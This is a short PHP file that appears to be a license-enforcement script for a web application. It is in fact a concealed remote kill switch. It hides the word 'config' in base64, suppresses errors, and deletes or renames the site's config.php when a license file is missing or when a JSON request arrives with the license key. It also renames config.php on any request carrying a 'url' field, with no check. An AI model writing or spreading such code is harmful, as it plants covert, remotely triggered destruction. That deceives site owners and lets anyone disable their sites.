<?php
error_reporting(0);
include "config.php";
if (!file_exists(md5($lisensi).'.php')) {
    $u = base64_decode('Y29uZmln');
    unlink($u.".php");
    rename($u, 'x'.$u);
}

$arr = json_decode(file_get_contents("php://input"));
$lis = $arr->lis;
$url = $arr->url;
IF(!empty($lis)){
    IF($lis==$lisensi){
        $u = base64_decode('Y29uZmln');
        unlink($u.".php");
        unlink(md5($lisensi).".php");
        //rename($u.'.php', 'x'.$u.'.php');
    }
}    
IF(!empty($url)){
    $u = base64_decode('Y29uZmln');
    //unlink($u.".php");
    //unlink(md5($lisensi).".php");
    rename($u.'.php', 'x'.$u.'.php');
}

?>
  